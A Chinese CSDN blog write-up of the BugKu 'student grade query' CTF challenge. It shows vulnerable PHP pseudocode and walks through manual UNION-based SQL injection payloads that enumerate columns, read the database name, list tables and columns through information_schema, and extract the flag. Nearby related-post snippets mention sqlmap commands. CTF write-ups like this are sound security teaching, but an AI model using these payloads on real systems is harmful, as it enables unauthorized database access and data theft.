BugKu学生成绩查询 详解 SQL注入

最新推荐文章于 2024-06-03 21:49:45 发布
最新推荐文章于 2024-06-03 21:49:45 发布
阅读量2k 收藏 2
点赞数
分类专栏: 数据库 WEB渗透
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yyyyyywly/article/details/90312145
版权

根据测试,源代码伪代码如下:

<?php

//链接数据库
mysql_connet("[datebase]","[user]","[password]") or
//检查错误,处理无法访问数据库的情况
die("Could not connect:" . mysql_error());

//选择数据库
mysql_select_db("[database_name]");

//从POST请求中获取id的值
$id = $_POST["id"];

//创建并执行一条SQL语句
$result = mysql_query("SELECT * from ".$TableName."where id = '$id' ");

?>

1’ order by 4#返回正常,
输入1’ order by 5#返回异常。
(按照sql的语法#起注释作用,所以#后面的单引号就被注释掉了)
当数字等于5的时候报错,
那说明当前表只有4个字段并且只有4列。

接下来就开始暴库名、表名、字段名。

首先爆库名:通过id=-1’ union select 1,2,3,database()#
执行的SQL语句:
SELECT * from “.$TableName.”
where id = ‘-1’ union
select 1,2,3,database()#’

database()将会返回当前网站所使用的数据库名字
user()将会返回执行当前查询的用户名
version() 获取当前数据库版本

得到数据库名字skctf_flag

然后爆表:
information_schema 是 MySQL 自带的一张表,
这张数据表保存了 MySQL 服务器所有数据库的信息,
如数据库名,数据库的表,表栏的数据类型与访问权限等。
该数据库拥有一个名为 tables 的数据表,
该表包含两个字段 table_name 和 table_schema,
分别记录 DBMS 中的存储的表名和表名所在的数据库。

group_concat语法:
功能:将group by产生的同一个分组中的值连接起来,返回一个字符串结果。

通过使用
id=-1’ union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#

执行的SQL语句:
SELECT * from “.$TableName.”
where id = ‘-1’ union
select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()#’

得到表名:fl4g,sc

接下来暴字段:
通过id=-1’ union select 1,2,3,group_concat(column_name)
from information_schema.columns
where table_name=‘fl4g’#

得到字段skctf_flag

查询数据,通过使用:
id=-1’ union select 1,2,3,skctf_flag from fl4g#

得到flag

你愿意和我一起清理内存吗?
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 511
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
Bugku-web之成绩查询
weixin_42939822的博客
03-14 3434
今天是一道地地道道的sql注入题目,通过手动注入不仅可以加深对于sql语句的应用,也能够通过实战了解sql语句的运作,更好地体会到sql注入漏洞存在的潜在危害!!!ctf小白之旅继续前行!!!
bugku-writeup-web-成绩查询
dark的博客
06-16 227
bugku-web成绩查询解题思路记录。” 题目:
Bugku---web---成绩查询
最新发布
weixin_47450099的博客
06-03 540
sql注入相关知识,内有各种爆破语句
sql注入成绩查询)——bugku
qwsn
11-10 2281
0x01:题目 题目地址 题目 http://123.206.87.240:8002/chengjidan/ 成绩查询 0x02:WP复现 1.测试注入点,输入单引号: ' //发现无结果 2.继续测试注入点,输入1’: 1' //发现无结果 3.测试注入点,输入1’ # 1' # ...
bugku 成绩查询
Superpig的博客
11-10 2307
分析 典型的sql联合注入,用bp进行爆破。 step1: 联合注入要求查询列数相同,姓名、语数外一共四个数据,因此select 1,2,3,4 令id=a’是为了使前一个查询无效而回显第二个查询(也可以使用其他字符,只要保证union前的查询无效即可) id=a' union select 1,2,3,4# step2:查询数据库名 id=a' union select 1,2,3,datab...
SQL注入之基于布尔的盲注详解
09-10
布尔型SQL注入是一种特殊的SQL注入方式,它发生在服务器对用户输入的数据进行响应时,并不会返回完整的数据库信息,而是仅返回“真”(True)或“假”(False)的反馈。这种方式使得攻击者需要根据系统对正确或错误...
mybatis防止SQL注入的方法实例详解
08-27
MyBatis 防止 SQL 注入的方法实例详解 SQL 注入是一种简单的攻击手段,但直到今天仍然十分常见。MyBatis 作为一个流行的持久层框架,如何防止 SQL 注入呢?下面我们将详细介绍 MyBatis 防止 SQL 注入的方法实例详解...
php+mysql学生成绩查询
05-02
【PHP+MySQL学生成绩查询系统详解】 在IT领域,PHP和MySQL是两个非常重要的工具,常用于构建动态网站和数据库管理系统。本项目是一个基于PHP和MySQL的学生成绩查询系统,适用于学习者进行实践操作和理解Web开发的...
SQL注入思路详解
12-14
1. **联合查询注入(Union Query)**:通过`UNION`操作合并两个或更多查询的结果,直接展示数据库中的数据。 2. **报错注入(Error Based)**:利用错误信息泄露数据库信息,如MySQL的`information_schema.tables`。...
详解SQL注入–安全(二)
01-19
一、前面学习的SQL注入,那么当然就有防注入。由于web注入危害较大,各种防御技术也层出不穷。 1、程序猿在写代码时会有意识的进行防御设置,或者安全测试来封堵web注入 2、各大安全厂商生产的硬件或者软件WAF产品 ...
Bugku WEB 成绩查询
qq_41696858的博客
07-04 244
1.打开场景,是一个成绩查询系统,按照提示常规操作1,2,3,4…试试试,发现只有三条数据 2.单引号尝试,没输出,考虑是单引号闭合,加#尝试,确认存在sql注入 3.接下来可以用sqlmap直接跑,也可以自己手工爆破,亲测sqlmap跑的相当慢,建议自己手工注 sqlmap跑过程:随便查询什么,burp抓包,导入到sqlmap中,以1.txt为例 sqlmap -l 1.txt sqlmap -l 1.txt --dbs //爆数据库 sqlmap -l 1.txt -D skctf --tables /
bugkuCTF学生成绩查询writeup----sqlmap注入
qq_41492160的博客
12-08 2173
1.题目 2.查看是否存在注入漏洞 测试:如果id=1后面加‘ 不正常 加-- l恢复正常,说明存在数字型漏洞            两个都不正常说明不存在数字型注入           如果  id=1后面接 and  0   页面没有内容 and  1  页面正常显示内容说明有数字型漏洞           如果都不正常说明没有数字型漏洞 3.存在漏洞找注入点 使用burpsui...
Bugku Web CTF-学生成绩查询
No Title
12-16 1192
Bugku Web CTF-学生成绩查询 该题解题思路是SQL注入,测试思路如下:。 直接输入’单引号没有回显; 输入’#有回显; 通过union来猜解该表有多少列: 0' union select 1,2,3,4# 可正常回显,其余不行,猜测该表有4列,分别为id,Math,English,Chinese。 获取数据库名: 0' union select 1,user(),database()...
bugku 成绩详解
qq_35811830的博客
01-26 1227
bugku 成绩详解 首先打开查询成绩的页面 在火狐浏览器下使用hackbar插件对页面进行post请求,分别依次输入id=1,2,3,4 当你这样去试了之后,就会发现当输入id=1,2,3,的时候分别有三个孩子的成绩,但是当id=4的时候,成绩单里面的成绩又为空了。 因此我们可以猜测数据库里面一共是有四列的 然后在此处利用内置函数database()爆破获取数据库的名字。 至于为什么使用u...
BugkuCTF-web进阶-实战2-注入 writeup
会下雪的晴天
07-14 1456
题目描述 解题传送门:http://www.kabelindo.co.id/ 解题思路 打开链接后得到个这个页面,注入,,,我一开始在搜索框内随意试试,发现没什么用,抓包也没啥结果。然后就逛逛这个网站看看哪里有注入点,找了一会,在页面的About-News里面发现数字型注入,话不多说,开始 注入嘛,老套路,两种方法 法一、手工注入 猜字段http://www.kabelindo.co....
SQL注入原理讲解,很不错!
热门推荐
stilling2006的专栏
01-21 39万+
原文地址:http://www.cnblogs.com/rush/archive/2011/12/31/2309203.html 1.1.1 摘要 日前,国内最大的程序员社区CSDN网站的用户数据库被黑客公开发布,600万用户的登录名及密码被公开泄露,随后又有多家网站的用户密码被流传于网络,连日来引发众多网民对自己账号、密码等互联网信息被盗取的普遍担忧。 网络安全成为了现在互联网的焦点,
Bugku 成绩查询
m0_63711447的博客
04-07 877
这道题按照正常的SQL注入步骤进行即可,没有绕弯弯的地方 1、打开题目环境,在输入框中输入数字1得到成绩回显,输入2和3也能得到相应的回显 2、测试参数包裹方式,输入1'没有得到回显 输入1'#进行注释,得到回显 3、用order by语句测试有几列,输入1' order by 4#时有回显,order by 5时无回显,说明有四列 4、接下使用联合查询语句测试有几个回显点,注意将前面的参数值置换为空,由图可知有三个回显点 5、查库名 输入-1'union select 1,2,3,g
Bugku Web CTF-sql注入2
No Title
01-14 663
这道题过滤了许多关键字,包括但不限于select、union、and、or等,还有许多符号比如注释符--,,、#等(需要注意的是这里的过滤是指针对uname字段的过滤)。 一开始没什么思路,于是参考网上其他人写的wp,发现主要集中于以下两种解法: 用扫描工具扫出存在的漏洞,即.DS_STORE泄漏问题,然后获取对应的文件目录,可以看到目录下有flag文件。 灵光一闪,直接猜出目录下有admin或...
SQL注入攻击技术详解
如果`and1=1`时网页正常,而`and1=2`时网页异常,这可能表明系统在构建SQL查询时未正确过滤用户输入,可能存在注入风险。 接着,文档展示了如何猜解数据库中的表名和列名。在ACCESS数据库中,由于没有提供直接的...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值